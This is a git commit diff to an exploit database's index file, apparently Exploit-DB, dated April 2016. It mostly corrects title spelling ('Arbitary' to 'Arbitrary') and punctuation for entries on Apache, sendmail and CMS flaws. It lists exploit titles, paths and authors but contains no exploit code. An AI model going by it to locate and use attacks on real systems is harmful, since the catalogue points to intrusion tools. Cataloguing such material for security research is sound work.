DB: 2016-04-01

4 new exploits Apache 1.3.x mod_mylo Remote Code Execution Exploit Apache 1.3.x mod_mylo - Remote Code Execution Exploit Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit Apache <= 1.3.31 mod_include - Local Buffer Overflow Exploit Sire 2.0 (lire.php) Remote File Inclusion/Arbitary File Upload Vulnerability Sire 2.0 (lire.php) - Remote File Inclusion/Arbitrary File Upload Vulnerability HP Digital Imaging (hpqxml.dll 2.0.0.133) Arbitary Data Write Exploit HP Digital Imaging (hpqxml.dll 2.0.0.133) - Arbitrary Data Write Exploit SecureBlackbox (PGPBBox.dll 5.1.0.112) Arbitary Data Write Exploit SecureBlackbox (PGPBBox.dll 5.1.0.112) - Arbitrary Data Write Exploit Kwalbum <= 2.0.2 Arbitary File Upload Vulnerability Kwalbum <= 2.0.2 - Arbitrary File Upload Vulnerability ZaoCMS (PhpCommander) Arbitary Remote File Upload Vulnerability ZaoCMS (PhpCommander) - Arbitrary Remote File Upload Vulnerability CMS Balitbang 3.3 Arbitary File Upload Vulnerability CMS Balitbang 3.3 - Arbitrary File Upload Vulnerability CMS Lokomedia 1.5 Arbitary File Upload Vulnerability CMS Lokomedia 1.5 - Arbitrary File Upload Vulnerability Apache 1.3.12 WebDAV Directory Listings Vulnerability Apache 1.3.12 - WebDAV Directory Listings Vulnerability Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability Apache 1.3 Web Server with PHP 3 - File Disclosure Vulnerability NCSA 1.3/1.4.x/1.5_Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability NCSA 1.3/1.4.x/1.5_ Apache httpd 0.8.11/0.8.14 - ScriptAlias Source Retrieval Vulnerability Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1) Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2) Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3) Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4) Apache 1.3 - Artificially Long Slash Path Directory Listing Vulnerability (1) Apache 1.3 - Artificially Long Slash Path Directory Listing Vulnerability (2) Apache 1.3 - Artificially Long Slash Path Directory Listing Vulnerability (3) Apache 1.3 - Artificially Long Slash Path Directory Listing Vulnerability (4) Shareplex 2.1.3.9/2.2.2 beta - Arbitary Local File Disclosure Vulnerability Shareplex 2.1.3.9/2.2.2 beta - Arbitrary Local File Disclosure Vulnerability Apache 1.3 Possible Directory Index Disclosure Vulnerability Apache 1.3 - Possible Directory Index Disclosure Vulnerability Apache 1.0/1.2/1.3 Server Address Disclosure Vulnerability Apache 1.0/1.2/1.3 - Server Address Disclosure Vulnerability Apache 1.3/2.0.x Server Side Include Cross-Site Scripting Vulnerability Apache 1.3/2.0.x - Server Side Include Cross-Site Scripting Vulnerability sendmail 8.11.6 Address Prescan Memory Corruption Vulnerability SendMail 8.11.6 - Address Prescan Memory Corruption Vulnerability Apache 1.3.x mod_include Local Buffer Overflow Vulnerability Apache 1.3.x mod_include - Local Buffer Overflow Vulnerability Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1) Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2) Apache 1.3.x - HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1) Apache 1.3.x - HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2) PodHawk 1.85 - Arbitary File Upload Vulnerability PodHawk 1.85 - Arbitrary File Upload Vulnerability LibrettoCMS File Manager Arbitary File Upload Vulnerability LibrettoCMS File Manager - Arbitrary File Upload Vulnerability DotNetNuke DNNspot Store 3.0.0 Arbitary File Upload DotNetNuke DNNspot Store 3.0.0 - Arbitrary File Upload Axway Secure Transport 5.1 SP2 - Arbitary File Upload via CSRF Axway Secure Transport 5.1 SP2 - Arbitrary File Upload via CSRF Apache Spark Cluster 1.3.x - Arbitary Code Execution Apache Spark Cluster 1.3.x - Arbitrary Code Execution Elastix 'graph.php' Local File Include Vulnerability Elastix 2.2.0 - 'graph.php' Local File Include Vulnerability MOBOTIX Video Security Cameras - CSRF Add Admin Exploit Apache OpenMeetings 1.9.x - 3.1.0 - ZIP File path Traversal Apache Jetspeed Arbitrary File Upload Wireshark - dissect_pktc_rekey Heap-based Out-of-Bounds Read
2016-04-01 05:03:13 +00:00 · 2016-04-01 05:03:13 +00:00 · 5de0917681
commit 5de0917681
parent 5d20c14812
7 changed files with 482 additions and 32 deletions
--- a/files.csv
+++ b/files.csv
@ -65,7 +65,7 @@ id,file,description,date,author,platform,type,port
 64,platforms/windows/remote/64.c,"Microsoft Windows - (RPC DCOM) Remote Buffer Overflow Exploit",2003-07-25,Flashsky,windows,remote,135
 65,platforms/windows/dos/65.c,"Microsoft Windows SQL Server Denial of Service Remote Exploit (MS03-031)",2003-07-25,refdom,windows,dos,0
 66,platforms/windows/remote/66.c,"Microsoft Windows 2000/XP - (RPC DCOM) Remote Exploit",2003-07-26,"H D Moore",windows,remote,135
-67,platforms/multiple/remote/67.c,"Apache 1.3.x mod_mylo Remote Code Execution Exploit",2003-07-28,"Carl Livitt",multiple,remote,80
+67,platforms/multiple/remote/67.c,"Apache 1.3.x mod_mylo - Remote Code Execution Exploit",2003-07-28,"Carl Livitt",multiple,remote,80
 68,platforms/linux/dos/68.c,"Linux Kernel <= 2.4.20 - decode_fh Denial of Service Exploit",2003-07-29,"Jared Stanbrough",linux,dos,0
 69,platforms/windows/remote/69.c,"Microsoft Windows RPC DCOM Remote Exploit (18 Targets)",2003-07-29,pHrail,windows,remote,135
 70,platforms/windows/remote/70.c,"Microsoft Windows - (RPC DCOM) Remote Exploit (48 Targets)",2003-07-30,N/A,windows,remote,135
@ -451,7 +451,7 @@ id,file,description,date,author,platform,type,port
 584,platforms/windows/remote/584.c,"Microsoft Windows Metafile (.emf) Heap Overflow Exploit (MS04-032)",2004-10-20,houseofdabus,windows,remote,0
 585,platforms/windows/dos/585.pl,"Microsoft Windows IIS - WebDAV XML Denial of Service Exploit (MS04-030)",2004-10-20,"Amit Klein",windows,dos,0
 586,platforms/linux/local/586.c,"BitchX 1.0c19 - Local Root Exploit (suid?)",2004-10-20,Sha0,linux,local,0
-587,platforms/linux/local/587.c,"Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit",2004-10-21,xCrZx,linux,local,0
+587,platforms/linux/local/587.c,"Apache <= 1.3.31 mod_include - Local Buffer Overflow Exploit",2004-10-21,xCrZx,linux,local,0
 588,platforms/windows/remote/588.py,"Ability Server 2.34 - FTP STOR Buffer Overflow",2004-10-21,muts,windows,remote,21
 589,platforms/windows/remote/589.html,"Multiple (Almost all) Browsers Tabbed Browsing Vulnerabilities",2004-10-22,"Jakob Balle",windows,remote,0
 590,platforms/windows/remote/590.c,"ShixxNote 6.net Remote Buffer Overflow Exploit",2004-10-22,class101,windows,remote,2000
@ -1388,7 +1388,7 @@ id,file,description,date,author,platform,type,port
 1653,platforms/php/webapps/1653.txt,"dnGuestbook <= 2.0 - Remote SQL Injection Vulnerabilities",2006-04-09,snatcher,php,webapps,0
 1654,platforms/php/webapps/1654.txt,"autonomous lan party <= 0.98.1.0 - Remote File Inclusion Vulnerability",2006-04-09,Codexploder,php,webapps,0
 1655,platforms/php/webapps/1655.php,"XBrite Members <= 1.1 (id) Remote SQL Injection Exploit",2006-04-09,snatcher,php,webapps,0
-1656,platforms/php/webapps/1656.txt,"Sire 2.0 (lire.php) Remote File Inclusion/Arbitary File Upload Vulnerability",2006-04-09,simo64,php,webapps,0
+1656,platforms/php/webapps/1656.txt,"Sire 2.0 (lire.php) - Remote File Inclusion/Arbitrary File Upload Vulnerability",2006-04-09,simo64,php,webapps,0
 1657,platforms/linux/dos/1657.asm,"Linux Kernel 2.6.x - sys_timer_create() Local Denial of Service Exploit",2006-04-09,fingerout,linux,dos,0
 1659,platforms/php/webapps/1659.php,"PHPList <= 2.10.2 - GLOBALS[] Remote Code Execution Exploit",2006-04-10,rgod,php,webapps,0
 1660,platforms/php/webapps/1660.pm,"Horde <= 3.0.9/3.1.0 - (Help Viewer) Remote Code Execution (Metasploit)",2006-04-10,Inkubus,php,webapps,0
@ -3766,7 +3766,7 @@ id,file,description,date,author,platform,type,port
 4115,platforms/php/webapps/4115.txt,"QuickTalk forum 1.3 (lang) Local File Inclusion Vulnerabilities",2007-06-27,Katatafish,php,webapps,0
 4116,platforms/php/webapps/4116.txt,"QuickTicket 1.2 (qti_checkname.php) Local File Inclusion Vulnerability",2007-06-27,Katatafish,php,webapps,0
 4118,platforms/windows/dos/4118.html,"RealNetworks RealPlayer/HelixPlayer SMIL wallclock Stack Overflow PoC",2007-06-27,axis,windows,dos,0
-4119,platforms/windows/remote/4119.html,"HP Digital Imaging (hpqxml.dll 2.0.0.133) Arbitary Data Write Exploit",2007-06-27,callAX,windows,remote,0
+4119,platforms/windows/remote/4119.html,"HP Digital Imaging (hpqxml.dll 2.0.0.133) - Arbitrary Data Write Exploit",2007-06-27,callAX,windows,remote,0
 4120,platforms/windows/dos/4120.html,"Sony Network Camera SNC-P5 1.0 - ActiveX viewer Heap Overflow PoC",2007-06-27,str0ke,windows,dos,0
 4121,platforms/windows/dos/4121.txt,"Microsoft Excel 2000/2003 - Sheet Name Vulnerability PoC",2007-06-27,ZhenHan.Liu,windows,dos,0
 4122,platforms/php/webapps/4122.txt,"b1gbb 2.24.0 (SQL Injection / XSS) Remote Vulnerabilities",2007-06-28,GoLd_M,php,webapps,0
@ -3823,7 +3823,7 @@ id,file,description,date,author,platform,type,port
 4173,platforms/php/webapps/4173.txt,"SquirrelMail G/PGP Encryption Plugin 2.0 - Command Execution Vuln",2007-07-11,jmp-esp,php,webapps,0
 4174,platforms/php/webapps/4174.txt,"PsNews 1.1 (show.php newspath) Local File Inclusion Vulnerability",2007-07-12,irk4z,php,webapps,0
 4175,platforms/multiple/dos/4175.php,"PHP 5.2.3 - bz2 com_print_typeinfo() Denial of Service Exploit",2007-07-12,shinnai,multiple,dos,0
-4176,platforms/windows/remote/4176.html,"SecureBlackbox (PGPBBox.dll 5.1.0.112) Arbitary Data Write Exploit",2007-07-12,callAX,windows,remote,0
+4176,platforms/windows/remote/4176.html,"SecureBlackbox (PGPBBox.dll 5.1.0.112) - Arbitrary Data Write Exploit",2007-07-12,callAX,windows,remote,0
 4177,platforms/windows/remote/4177.html,"Program Checker (sasatl.dll 1.5.0.531) DebugMsgLog Heap Spraying Exploit",2007-07-12,callAX,windows,remote,0
 4178,platforms/windows/local/4178.txt,"Symantec AntiVirus - symtdi.sys Local Privilege Escalation Exploit",2007-07-12,"Zohiartze Herce",windows,local,0
 4179,platforms/php/webapps/4179.php,"MkPortal <= 1.1.1 reviews / gallery modules SQL Injection Exploit",2007-07-12,Coloss,php,webapps,0
@ -6234,7 +6234,7 @@ id,file,description,date,author,platform,type,port
 6661,platforms/windows/remote/6661.txt,"Serv-U <= 7.3 - Remote FTP File Replacement Vulnerability (auth)",2008-10-03,dmnt,windows,remote,0
 6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite <= 1.3 - Blind SQL Injection Exploit",2008-10-03,StAkeR,php,webapps,0
 6663,platforms/php/webapps/6663.txt,"CCMS 3.1 (skin) Multiple Local File Inclusion Vulnerabilities",2008-10-03,SirGod,php,webapps,0
-6664,platforms/php/webapps/6664.txt,"Kwalbum <= 2.0.2 Arbitary File Upload Vulnerability",2008-10-03,"CWH Underground",php,webapps,0
+6664,platforms/php/webapps/6664.txt,"Kwalbum <= 2.0.2 - Arbitrary File Upload Vulnerability",2008-10-03,"CWH Underground",php,webapps,0
 6666,platforms/windows/remote/6666.pl,"mIRC 6.34 - Remote Buffer Overflow Exploit",2008-10-04,SkD,windows,remote,0
 6667,platforms/php/webapps/6667.txt,"pPIM 1.01 (notes.php id) Local File Inclusion Vulnerability",2008-10-04,JosS,php,webapps,0
 6668,platforms/windows/dos/6668.txt,"AyeView 2.20 (malformed gif image) Local Crash Exploit",2008-10-04,suN8Hclf,windows,dos,0
@ -8273,7 +8273,7 @@ id,file,description,date,author,platform,type,port
 8770,platforms/windows/local/8770.py,"Winamp <= 5.55 - (MAKI script) Universal Seh Overwrite Exploit",2009-05-22,His0k4,windows,local,0
 8771,platforms/php/webapps/8771.htm,"ZaoCMS (user_updated.php) Remote Change Password Exploit",2009-05-22,"ThE g0bL!N",php,webapps,0
 8772,platforms/windows/local/8772.pl,"Winamp <= 5.55 - (MAKI script) Universal Integer Overflow Exploit",2009-05-22,"Encrypt3d.M!nd ",windows,local,0
-8773,platforms/php/webapps/8773.txt,"ZaoCMS (PhpCommander) Arbitary Remote File Upload Vulnerability",2009-05-22,Qabandi,php,webapps,0
+8773,platforms/php/webapps/8773.txt,"ZaoCMS (PhpCommander) - Arbitrary Remote File Upload Vulnerability",2009-05-22,Qabandi,php,webapps,0
 8774,platforms/php/webapps/8774.htm,"Mole Group Sky Hunter/Bus Ticket Scripts Change Admin Pass Exploit",2009-05-22,G4N0K,php,webapps,0
 8775,platforms/php/webapps/8775.txt,"Mole Group Restaurant Directory Script 3.0 Change Admin Pass Vuln",2009-05-22,G4N0K,php,webapps,0
 8776,platforms/php/webapps/8776.txt,"photovideotube 1.11 - Multiple Vulnerabilities",2009-05-22,Hakxer,php,webapps,0
@ -14803,11 +14803,11 @@ id,file,description,date,author,platform,type,port
 17005,platforms/php/webapps/17005.txt,"Kleophatra 0.1.4 - Arbitrary Upload File Vulnerability (0day)",2011-03-19,Xr0b0t,php,webapps,0
 17006,platforms/php/webapps/17006.txt,"balitbang CMS 3.3 - Multiple Vulnerabilities",2011-03-19,Xr0b0t,php,webapps,0
 17007,platforms/php/webapps/17007.txt,"Phpbuddies - Arbitrary Upload File Vulnerability",2011-03-19,Xr0b0t,php,webapps,0
-17009,platforms/php/webapps/17009.txt,"CMS Balitbang 3.3 Arbitary File Upload Vulnerability",2011-03-19,eidelweiss,php,webapps,0
+17009,platforms/php/webapps/17009.txt,"CMS Balitbang 3.3 - Arbitrary File Upload Vulnerability",2011-03-19,eidelweiss,php,webapps,0
 17011,platforms/asp/webapps/17011.txt,"Douran 3.9.7.8 File Download/Source Code Disclosure Vulnerability",2011-03-20,"AJAX Security Team",asp,webapps,0
 17012,platforms/windows/local/17012.py,"Mediacoder 2011 RC3 m3u Buffer Overflow Exploit",2011-03-20,"Oh Yaw Theng",windows,local,0
 17013,platforms/windows/local/17013.pl,"MPlayer Lite r33064 - m3u SEH Overflow Exploit",2011-03-20,"C4SS!0 and h1ch4m",windows,local,0
-17014,platforms/php/webapps/17014.txt,"CMS Lokomedia 1.5 Arbitary File Upload Vulnerability",2011-03-21,eidelweiss,php,webapps,0
+17014,platforms/php/webapps/17014.txt,"CMS Lokomedia 1.5 - Arbitrary File Upload Vulnerability",2011-03-21,eidelweiss,php,webapps,0
 17015,platforms/asp/webapps/17015.txt,"Element-IT PowUpload 1.3 File Arbitrary Upload",2011-03-21,"Daniel Godoy",asp,webapps,0
 17016,platforms/asp/webapps/17016.txt,"EAFlashUpload 2.5 - File Arbitrary Upload",2011-03-21,"Daniel Godoy",asp,webapps,0
 17018,platforms/php/webapps/17018.txt,"Shimbi CMS - Multiple SQL Injection Vulnerabilities",2011-03-21,p0pc0rn,php,webapps,0
@ -17545,7 +17545,7 @@ id,file,description,date,author,platform,type,port
 20207,platforms/multiple/remote/20207.txt,"QSSL Voyager 2.0 1B .photon Directory Information Disclosure",2000-09-01,neonbunny,multiple,remote,0
 20208,platforms/php/webapps/20208.txt,"nathan purciful phpphotoalbum 0.9.9 - Directory Traversal Vulnerability",2000-09-07,pestilence,php,webapps,0
 20209,platforms/windows/local/20209.cpp,"Microsoft Windows 2000 - Still Image Service Privilege Escalation Vulnerability",2000-09-06,dildog,windows,local,0
-20210,platforms/linux/remote/20210.txt,"Apache 1.3.12 WebDAV Directory Listings Vulnerability",2000-09-07,Mnemonix,linux,remote,0
+20210,platforms/linux/remote/20210.txt,"Apache 1.3.12 - WebDAV Directory Listings Vulnerability",2000-09-07,Mnemonix,linux,remote,0
 20211,platforms/windows/remote/20211.c,"Mobius DocumentDirect for the Internet 1.2 - Buffer Overflow Vulnerabilities",2000-09-08,wildcoyote,windows,remote,0
 20212,platforms/unix/local/20212.c,"GNOME esound 0.2.19 Unix Domain Socket Race Condition Vulnerability",2000-08-31,"Kris Kennaway",unix,local,0
 20213,platforms/aix/local/20213.txt,"AIX 4.2/4.3 - netstat -Z Statistic Clearing Vulnerability",2000-09-03,"alex medvedev",aix,local,0
@ -17795,7 +17795,7 @@ id,file,description,date,author,platform,type,port
 20463,platforms/cgi/remote/20463.txt,"WEBgais 1.0 - Remote Command Execution Vulnerability",1997-07-10,"Razvan Dragomirescu",cgi,remote,0
 20464,platforms/windows/dos/20464.py,"Spytech NetVizor 6.1 - (services.exe) DoS",2012-08-12,loneferret,windows,dos,0
 20465,platforms/cgi/remote/20465.sh,"Squid Web Proxy 2.2 cachemgr.cgi Unauthorized Connection Vulnerability",1999-07-23,fsaa,cgi,remote,0
-20466,platforms/multiple/remote/20466.txt,"Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability",2000-12-06,"china nsl",multiple,remote,0
+20466,platforms/multiple/remote/20466.txt,"Apache 1.3 Web Server with PHP 3 - File Disclosure Vulnerability",2000-12-06,"china nsl",multiple,remote,0
 20467,platforms/multiple/remote/20467.txt,"Inktomi Search Software 3.0 Source Disclosure Vulnerability",2000-12-05,"china nsl",multiple,remote,0
 20468,platforms/multiple/remote/20468.txt,"Inktomi Search Software 3.0 Information Disclosure Vulnerability",2000-12-05,"china nsl",multiple,remote,0
 20469,platforms/unix/remote/20469.txt,"Endymion MailMan 3.0.x - Remote Arbitrary Command Execution Vulnerability",2000-12-06,"Secure Reality Advisories",unix,remote,0
@ -17919,7 +17919,7 @@ id,file,description,date,author,platform,type,port
 20592,platforms/jsp/remote/20592.txt,"Oracle 8.1.7 JSP/JSPSQL Remote File Reading Vulnerability",2000-01-22,"Georgi Guninski",jsp,remote,0
 20593,platforms/freebsd/remote/20593.txt,"FreeBSD 3.x/4.x ipfw Filtering Evasion Vulnerability",2001-01-23,"Aragon Gouveia",freebsd,remote,0
 20594,platforms/unix/remote/20594.txt,"Wu-Ftpd 2.4.2/2.5/2.6 - Debug Mode Client Hostname Format String Vulnerability",2001-01-23,"Wu-ftpd team",unix,remote,0
-20595,platforms/multiple/remote/20595.txt,"NCSA 1.3/1.4.x/1.5_Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability",1999-09-25,anonymous,multiple,remote,0
+20595,platforms/multiple/remote/20595.txt,"NCSA 1.3/1.4.x/1.5_ Apache httpd 0.8.11/0.8.14 - ScriptAlias Source Retrieval Vulnerability",1999-09-25,anonymous,multiple,remote,0
 20596,platforms/windows/dos/20596.c,"Microsoft Windows NT 4.0 Networking Mutex DoS Vulnerability",2001-01-24,"Arne Vidstrom",windows,dos,0
 20597,platforms/linux/remote/20597.txt,"Majordomo 1.89/1.90 lists Command Execution Vulnerability",1994-06-06,"Razvan Dragomirescu",linux,remote,0
 20598,platforms/php/webapps/20598.txt,"Jaow CMS 2.3 - Blind SQLi Vulnerability",2012-08-17,loneferret,php,webapps,0
@ -18014,10 +18014,10 @@ id,file,description,date,author,platform,type,port
 20689,platforms/cgi/remote/20689.pl,"SWSoft ASPSeek 1.0 s.cgi Buffer Overflow Vulnerability",2001-03-19,teleh0r,cgi,remote,0
 20690,platforms/linux/remote/20690.sh,"wu-ftpd 2.4/2.5/2.6_Trolltech ftpd 1.2_ProFTPD 1.2_BeroFTPD 1.3.4 FTP - glob Expansion Vulnerability",2001-03-15,"Frank DENIS",linux,remote,0
 20691,platforms/linux/local/20691.txt,"FTPFS 0.1.1/0.2.1/0.2.2 mount Buffer Overflow Vulnerability",2001-03-13,"Frank DENIS",linux,local,0
-20692,platforms/multiple/remote/20692.pl,"Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)",2001-06-13,rfp,multiple,remote,0
+20692,platforms/multiple/remote/20692.pl,"Apache 1.3 - Artificially Long Slash Path Directory Listing Vulnerability (1)",2001-06-13,rfp,multiple,remote,0
-20693,platforms/multiple/remote/20693.c,"Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)",2002-02-21,st0ic,multiple,remote,0
+20693,platforms/multiple/remote/20693.c,"Apache 1.3 - Artificially Long Slash Path Directory Listing Vulnerability (2)",2002-02-21,st0ic,multiple,remote,0
-20694,platforms/multiple/remote/20694.pl,"Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3)",2001-06-13,farm9,multiple,remote,0
+20694,platforms/multiple/remote/20694.pl,"Apache 1.3 - Artificially Long Slash Path Directory Listing Vulnerability (3)",2001-06-13,farm9,multiple,remote,0
-20695,platforms/multiple/remote/20695.pl,"Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4)",2001-06-13,farm9,multiple,remote,0
+20695,platforms/multiple/remote/20695.pl,"Apache 1.3 - Artificially Long Slash Path Directory Listing Vulnerability (4)",2001-06-13,farm9,multiple,remote,0
 20696,platforms/windows/dos/20696.txt,"Alt-N MDaemon 3.5.6/5.0.7/6.x IMAP DoS Vulnerability",2001-03-23,nitr0s,windows,dos,0
 20697,platforms/unix/local/20697.c,"DG/UX 4.20 lpsched Long Error Message Buffer Overflow Vulnerability",2001-03-19,"Luciano Rocha",unix,local,0
 20707,platforms/linux/webapps/20707.py,"Symantec Web Gateway <= 5.0.3.18 - Arbitrary Password Change",2012-08-21,Kc57,linux,webapps,0
@ -18034,7 +18034,7 @@ id,file,description,date,author,platform,type,port
 20721,platforms/linux/local/20721.c,"Linux kernel <= 2.2.18 - ptrace/execve Race Condition Vulnerability (2)",2001-03-27,"Wojciech Purczynski",linux,local,0
 20722,platforms/multiple/remote/20722.txt,"Caucho Technology Resin 1.2/1.3 JavaBean Disclosure Vulnerability",2001-04-03,lovehacker,multiple,remote,0
 20723,platforms/windows/remote/20723.pl,"Gene6 BPFTP FTP Server 2.0 User Credentials Disclosure Vulnerability",2001-04-03,"Rob Beck",windows,remote,0
-20724,platforms/hp-ux/local/20724.txt,"Shareplex 2.1.3.9/2.2.2 beta - Arbitary Local File Disclosure Vulnerability",2001-03-30,"Dixie Flatline",hp-ux,local,0
+20724,platforms/hp-ux/local/20724.txt,"Shareplex 2.1.3.9/2.2.2 beta - Arbitrary Local File Disclosure Vulnerability",2001-03-30,"Dixie Flatline",hp-ux,local,0
 20725,platforms/cgi/remote/20725.txt,"Microburst uStorekeeper 1.x - Remote Arbitrary Commands Vulnerability",2001-04-02,"UkR hacking team",cgi,remote,0
 20726,platforms/windows/remote/20726.pl,"Gene6 BPFTP Server 2.0 File Existence Disclosure Vulnerability",2001-04-03,"Rob Beck",windows,remote,0
 20727,platforms/linux/remote/20727.c,"Ntpd Remote Buffer Overflow Vulnerability",2001-04-04,"babcia padlina ltd",linux,remote,0
@ -18301,7 +18301,7 @@ id,file,description,date,author,platform,type,port
 20999,platforms/hardware/local/20999.c,"Samsung ml85p Printer Driver 1.0 Insecure Temporary File Creation Vulnerability (1)",2001-07-10,"Charles Stevenson",hardware,local,0
 21000,platforms/hardware/local/21000.sh,"Samsung ml85p Printer Driver 1.0 Insecure Temporary File Creation Vulnerability (2)",2001-07-10,ml85p,hardware,local,0
 21001,platforms/hardware/local/21001.txt,"Samsung ml85p Printer Driver 1.0 Insecure Temporary File Creation Vulnerability (3)",2001-07-10,ml85p,hardware,local,0
-21002,platforms/multiple/remote/21002.txt,"Apache 1.3 Possible Directory Index Disclosure Vulnerability",2001-07-10,Kevin,multiple,remote,0
+21002,platforms/multiple/remote/21002.txt,"Apache 1.3 - Possible Directory Index Disclosure Vulnerability",2001-07-10,Kevin,multiple,remote,0
 21003,platforms/windows/remote/21003.txt,"Microsoft Outlook 98/2000/2002 Unauthorized Email Access Vulnerability",2001-07-12,"Georgi Guninski",windows,remote,0
 21004,platforms/windows/remote/21004.txt,"Microsoft Outlook 98/2000/2002 - Arbitrary Code Execution Vulnerability",2001-07-12,"Georgi Guninski",windows,remote,0
 21005,platforms/php/webapps/21005.txt,"admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",php,webapps,0
@ -18360,7 +18360,7 @@ id,file,description,date,author,platform,type,port
 21064,platforms/unix/remote/21064.c,"Fetchmail 5.x POP3 Reply Signed Integer Index Vulnerability",2001-08-09,"Salvatore Sanfilippo -antirez-",unix,remote,0
 21065,platforms/php/webapps/21065.pl,"phpBB 1.x Page Header Remote Arbitrary Command Execution Vulnerability",2001-07-31,UnderSpell,php,webapps,0
 21066,platforms/unix/remote/21066.c,"Fetchmail 5.x IMAP Reply Signed Integer Index Vulnerability",2001-08-09,"Sanfillipo antirez",unix,remote,0
-21067,platforms/multiple/remote/21067.c,"Apache 1.0/1.2/1.3 Server Address Disclosure Vulnerability",2001-08-21,magnum,multiple,remote,0
+21067,platforms/multiple/remote/21067.c,"Apache 1.0/1.2/1.3 - Server Address Disclosure Vulnerability",2001-08-21,magnum,multiple,remote,0
 21068,platforms/cgi/remote/21068.txt,"SIX-webboard 2.01 File Retrieval Vulnerability",2001-08-31,"Hannibal Lector",cgi,remote,0
 21069,platforms/windows/local/21069.c,"Microsoft Windows 2000 RunAs Service Named Pipe Hijacking Vulnerability",2001-12-11,Camisade,windows,local,0
 21070,platforms/osx/local/21070.txt,"Apple Open Firmware 4.1.7/4.1.8 Insecure Password Vulnerability",2001-08-15,"Macintosh Security",osx,local,0
@ -19095,7 +19095,7 @@ id,file,description,date,author,platform,type,port
 21882,platforms/unix/remote/21882.txt,"Apache Tomcat 3.2 - Directory Disclosure Vulnerability",2002-10-01,"HP Security",unix,remote,0
 21883,platforms/windows/remote/21883.html,"Microsoft Internet Explorer 5 Document Reference Zone Bypass Vulnerability",2002-10-01,"Liu Die Yu",windows,remote,0
 21884,platforms/unix/local/21884.txt,"Sendmail 8.12.x SMRSH Double Pipe Access Validation Vulnerability",2002-10-01,zen-parse,unix,local,0
-21885,platforms/multiple/remote/21885.txt,"Apache 1.3/2.0.x Server Side Include Cross-Site Scripting Vulnerability",2002-10-02,mattmurphy,multiple,remote,0
+21885,platforms/multiple/remote/21885.txt,"Apache 1.3/2.0.x - Server Side Include Cross-Site Scripting Vulnerability",2002-10-02,mattmurphy,multiple,remote,0
 21886,platforms/php/webapps/21886.txt,"Py-Membres 3.1 Index.PHP Unauthorized Access Vulnerability",2002-10-02,frog,php,webapps,0
 21821,platforms/windows/dos/21821.c,"Trillian 0.74 IRC PART Message Denial of Service Vulnerability",2002-09-22,"Lance Fitz-Herbert",windows,dos,0
 21881,platforms/bsd/local/21881.txt,"Rogue 5.3 - Local Buffer Overflow Vulnerability",2002-09-30,stanojr@iserver.sk,bsd,local,0
@ -19692,7 +19692,7 @@ id,file,description,date,author,platform,type,port
 22439,platforms/php/webapps/22439.txt,"PostNuke 0.72x Members_List Module Path Disclosure",2003-03-28,rkc,php,webapps,0
 22440,platforms/hardware/dos/22440.c,"D-Link DI-614+ IP Fragment Reassembly Denial of Service Vulnerability",1998-04-16,humble,hardware,dos,0
 22441,platforms/multiple/dos/22441.txt,"Mozilla 1.x_Opera 7.0 LiveConnect JavaScript Denial of Service Vulnerability",2003-03-28,"Marc Schoenefeld",multiple,dos,0
-22442,platforms/unix/remote/22442.c,"sendmail 8.11.6 Address Prescan Memory Corruption Vulnerability",2003-03-29,sorbo,unix,remote,0
+22442,platforms/unix/remote/22442.c,"SendMail 8.11.6 - Address Prescan Memory Corruption Vulnerability",2003-03-29,sorbo,unix,remote,0
 22443,platforms/php/webapps/22443.txt,"Beanwebb Guestbook 1.0 Unauthorized Administrative Access Vulnerability",2003-03-29,euronymous,php,webapps,0
 22444,platforms/php/webapps/22444.txt,"Justice Guestbook 1.3 Path Disclosure Vulnerability",2003-03-29,euronymous,php,webapps,0
 22445,platforms/php/webapps/22445.txt,"ScozBook 1.1 Path Disclosure Vulnerability",2003-03-29,euronymous,php,webapps,0
@ -21854,7 +21854,7 @@ id,file,description,date,author,platform,type,port
 24691,platforms/multiple/dos/24691.txt,"Vypress Tonecast 1.3 - Remote Denial of Service Vulnerability",2004-10-19,"Luigi Auriemma",multiple,dos,0
 24692,platforms/php/webapps/24692.txt,"Jan Erdmann Jebuch 1.0 HTML Injection Vulnerability",2004-10-19,PuWu,php,webapps,0
 24693,platforms/windows/remote/24693.txt,"Microsoft Internet Explorer 5.x Valid File Drag and Drop Embedded Code Vulnerability",2004-10-20,http-equiv,windows,remote,0
-24694,platforms/linux/local/24694.c,"Apache 1.3.x mod_include Local Buffer Overflow Vulnerability",2004-10-18,xCrZx,linux,local,0
+24694,platforms/linux/local/24694.c,"Apache 1.3.x mod_include - Local Buffer Overflow Vulnerability",2004-10-18,xCrZx,linux,local,0
 24977,platforms/linux/remote/24977.txt,"CUPS 1.1.x - HPGL File Processor Buffer Overflow Vulnerability",2004-12-15,"Ariel Berkman",linux,remote,0
 24978,platforms/linux/remote/24978.txt,"Xine-Lib 0.9/1 - Remote Client-Side Buffer Overflow Vulnerability",2004-12-16,"Ariel Berkman",linux,remote,0
 24696,platforms/linux/remote/24696.c,"Linux Kernel 2.6.x - IPTables Logging Rules Integer Underflow Vulnerability",2004-11-21,"Richard Hart",linux,remote,0
@ -22770,8 +22770,8 @@ id,file,description,date,author,platform,type,port
 25621,platforms/windows/remote/25621.txt,"software602 602 lan suite 2004 - Directory Traversal Vulnerability",2005-05-05,dr_insane,windows,remote,0
 25622,platforms/cgi/webapps/25622.txt,"MegaBook 2.0/2.1 Admin.CGI EntryID Cross-Site Scripting Vulnerability",2005-05-05,"Spy Hat",cgi,webapps,0
